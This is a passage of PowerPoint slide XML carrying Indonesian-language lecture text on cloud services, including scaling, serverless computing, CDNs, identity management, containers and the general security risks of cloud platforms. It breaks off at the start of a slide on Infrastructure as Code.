              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>otomatis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pergeseran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dinamis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>respons</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fluktuasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>permintaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengembangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengabstraksikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Selain </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>itu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, platform Cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengiriman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> (CDN) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>canggih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengoptimalkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lalu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lintas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyimpan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di cache, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>objek</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penyimpanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terstruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sering</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> kali </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggantikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tradisional</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Alat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>manajemen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>identitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>fitur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lanjut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>metode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>integrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> platform yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>alat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>orkestrasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kontainer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengubah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>cara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>penerapan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengelolaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> AI dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pembelajaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mesin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, basis data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> IoT backend, dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemampuan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>analisis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semakin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memperluas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jangkauan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kemungkinan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memanfaatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>arsitektur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memberikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>potensi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>belum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pernah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sebelumnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>organisasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kecil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Namun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>meskipun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan-layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diragukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lagi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendorong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>inovasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>transformatif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>laju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perubahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>risiko</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dikenal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di platform cloud </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memicu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>signifikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pelanggaran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memecahkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekor</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136</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="130308612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Teknologi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Otomasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Awan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Infrastruktur</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Kode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Infrastructure as Code (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>praktik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rekayasa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lunak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengelola</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
